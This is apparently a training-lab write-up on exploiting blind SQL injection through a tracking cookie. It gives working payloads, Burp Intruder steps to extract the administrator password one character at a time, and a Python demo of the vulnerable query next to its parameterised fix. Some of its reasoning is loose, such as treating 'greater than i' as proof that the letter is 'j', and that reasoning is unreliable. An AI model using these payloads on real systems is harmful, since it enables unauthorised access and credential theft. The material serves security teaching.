Problem Statement:
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a “Welcome back” message in the page if the query returns any rows.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
Using the queries below we will first find out whether blind SQL injection is possible or not. The first is the query the application runs with a normal tracking cookie; the other two show what it becomes when a condition is injected into the cookie value:
SELECT TrackingId FROM Table_Name WHERE TrackingId = 'ZC5EuA7KoIDaKOyB'
SELECT TrackingId FROM Table_Name WHERE TrackingId = 'x' AND '1' = '1'--'
SELECT TrackingId FROM Table_Name WHERE TrackingId = 'x' AND '1' = '2'--'
Steps to solve this:
First we need to find out whether there is a blind SQL injection or not. With the trick below we will be able to figure this out.
- Send ' AND 1=1-- in the cookie; in the response we will see the Welcome back message.
I am using Burp Suite to capture the traffic and perform the further checks.
In the Cookie TrackingId below I am entering a condition which will always be true: ' AND 1=1--
I get the Welcome back message.

If I send ' AND 1=2-- instead, the Welcome back message will not be in the response.

Explanation of the above demo:
-> The first of these values causes the query to return results, because the injected AND '1'='1 condition is true, and so the "Welcome back" message is displayed.
-> The second value causes the query to return no results, because the injected condition is false, and so the "Welcome back" message is not displayed.
** This allows us to determine the answer to any single injected condition, and so extract data one bit at a time.
For example, suppose there is a table called Users with the columns Username and Password, and a user called Administrator. We can systematically determine the password for this user by sending a series of inputs to test the password one character at a time.
Note: Refer to the "What is SUBSTRING in SQL?" subsection to understand the SUBSTRING syntax.
To do this, we start with the following input:
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
This returns the “Welcome back” message, indicating that the injected condition is true, and so the first character of the password is greater than m.
Next, we send the following input:
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 't
This does not return the “Welcome back” message, indicating that the injected condition is false, and so the first character of the password is not greater than t.
Eventually, we send the following input, which returns the “Welcome back” message, thereby confirming that the first character of the password is s:
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's
We can continue this process to systematically determine the full password for the Administrator user.
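To show concretely why the conditional response above works as a one-bit oracle, and why it disappears once the cookie is bound as a parameter, here is an added Python example (it is not part of the original write-up or of the lab's code). It assumes a tracking table called tracking with a TrackingId column, uses SQLite in memory, and appends each condition to a tracking ID that actually exists.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's database. Table/column names for
# the tracking cookie are assumptions; the users table is as the lab describes.
VALID_COOKIE = "ZC5EuA7KoIDaKOyB"
ADMIN_PASSWORD = "nnfhpuqbu12lybuvahck"  # the value recovered later in the write-up

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking (TrackingId TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO tracking VALUES (?)", (VALID_COOKIE,))
    conn.execute("INSERT INTO users VALUES ('administrator', ?)", (ADMIN_PASSWORD,))
    return conn

def welcome_back_vulnerable(conn, cookie):
    """Query built by string concatenation, as the lab's backend evidently does.
    True means the query returned a row, i.e. the page would say 'Welcome back'."""
    sql = "SELECT TrackingId FROM tracking WHERE TrackingId = '" + cookie + "'"
    return conn.execute(sql).fetchone() is not None

def welcome_back_fixed(conn, cookie):
    """Same lookup with a bound parameter: the cookie is data, never SQL text,
    so an injected condition is just a string that matches no TrackingId."""
    sql = "SELECT TrackingId FROM tracking WHERE TrackingId = ?"
    return conn.execute(sql, (cookie,)).fetchone() is not None

def oracle_results(check):
    """Feed the probes from the text to a lookup function and record the oracle bit.
    Each condition is appended to the valid cookie, so the AND only changes the
    result through the injected condition itself (SQLite spells SUBSTRING as substr)."""
    conn = make_db()
    first_char = "substr((SELECT password FROM users WHERE username = 'administrator'), 1, 1)"
    return {
        "plain": check(conn, VALID_COOKIE),
        "and_true": check(conn, VALID_COOKIE + "' AND '1'='1"),
        "and_false": check(conn, VALID_COOKIE + "' AND '1'='2"),
        "first_gt_m": check(conn, VALID_COOKIE + "' AND " + first_char + " > 'm"),
        "first_gt_t": check(conn, VALID_COOKIE + "' AND " + first_char + " > 't"),
    }

if __name__ == "__main__":
    for name, fn in (("vulnerable", welcome_back_vulnerable), ("fixed", welcome_back_fixed)):
        print(name, oracle_results(fn))
```

With the concatenated query the result flips with the injected condition, so every response leaks one bit; with the parameterised query only the untouched cookie matches and every probe returns the same answer, which is the fix for this class of bug.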
- In the second step we will figure out whether the supplied username is valid or not, and whether the username and password columns exist or not. It will also confirm the length of the password. Let's see this in MySQL with an example.
Assumption: in this example I am using the first name as the user name and the last name as the password.
This query will show us the last name if it matches the condition below.
Note: the user's first name and last name are Steve Jobs.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = 'steve' AND length(cust_last_name) > 4;
Example 1: in this case I am checking whether the user's last name (password) is greater than 4 characters.
Since we don't see any result, that means it is not greater than 4 characters.

Example 2: in the second example I ask whether it is greater than 3, and then I get to see Steve's last name, because the last name is greater than 3 but less than or equal to 4 characters. The answer in my output is Steve's last name.

Let’s check the above example from Burp and let’s see if we get to see the welcome message.
- First we will verify whether the administrator user name exists or not. If the query below is true, we will get the Welcome back message in the response.
Query: x' UNION SELECT 'a' FROM USERS WHERE Username = 'administrator'--

- Next we will find out whether the length of the password is greater than 1.
Query: xx' UNION SELECT 'a' FROM users WHERE username = 'administrator' AND length(password) > 1--
In the same way we go on finding the actual length of the password, until we stop getting the Welcome back message in the response.
xx' UNION SELECT 'a' FROM users WHERE username = 'administrator' AND length(password) > 2--
xx' UNION SELECT 'a' FROM users WHERE username = 'administrator' AND length(password) > 3--
And so on...
Up to 19 I get the Welcome back message.


- Next is to run the payload to guess the password characters one by one.
Query: XX' UNION SELECT 'a' FROM users WHERE username = 'administrator' AND substring(password, 1, 1) = 'a'--
Now we need to set the payload to discover the password one character at a time. The syntax is:
SUBSTRING(string, start, length)
We need to find out the character at start position 1 ('a', 'b', ... and so on).
Example:
substring(password, 1, 1) = 'a'
substring(password, 1, 1) = 'b'
substring(password, 1, 1) = 'c'
substring(password, 1, 1) = 'd'
And so on until z.
After that we change the start position to 2:
substring(password, 2, 1) = 'a'
substring(password, 2, 1) = 'b'
substring(password, 2, 1) = 'c'
And so on until z.
This goes on up to position 19. It is a long password, so this will take time.

Send the above request to Intruder and set the payload positions.

We can test the same thing with our MySQL query to find out the characters of the password one by one.
The 1st letter is greater than 'i', which means it is 'j'.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = 'steve' AND SUBSTRING(cust_last_name,1,1)>'i';

The 2nd letter is greater than 'n', which means it is 'o'.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = 'steve' AND SUBSTRING(cust_last_name,2,1)>'n';

The 3rd letter is greater than 'a', which means it is 'b'.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = 'steve' AND SUBSTRING(cust_last_name,3,1)>'a';

The query below tells us that the 4th character of the password is greater than 'r', which means it is 's'.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = 'steve' AND SUBSTRING(cust_last_name,4,1)>'r';

The Intruder payload works the same way: it tries every letter at every position, which takes a lot of time.
Finally we should see the results below.
After setting the payload we need to start the attack and sort the results by the Welcome column.
Now we need to write down the password by reading the payload 1 column from the lowest position to the highest.
nnfhpuqbu12lybuvahck
1 = n
2 = n
3 = f
4 = h
5 = p
6 = u
7 = q
8 = b
9 = u
10 = 1
11 = 2
12 = l
13 = y
14 = b
15 = u
16 = v
17 = a
18 = h
19 = c
20 = k


For reference:
Blind SQL injection with conditional responses (Video solution)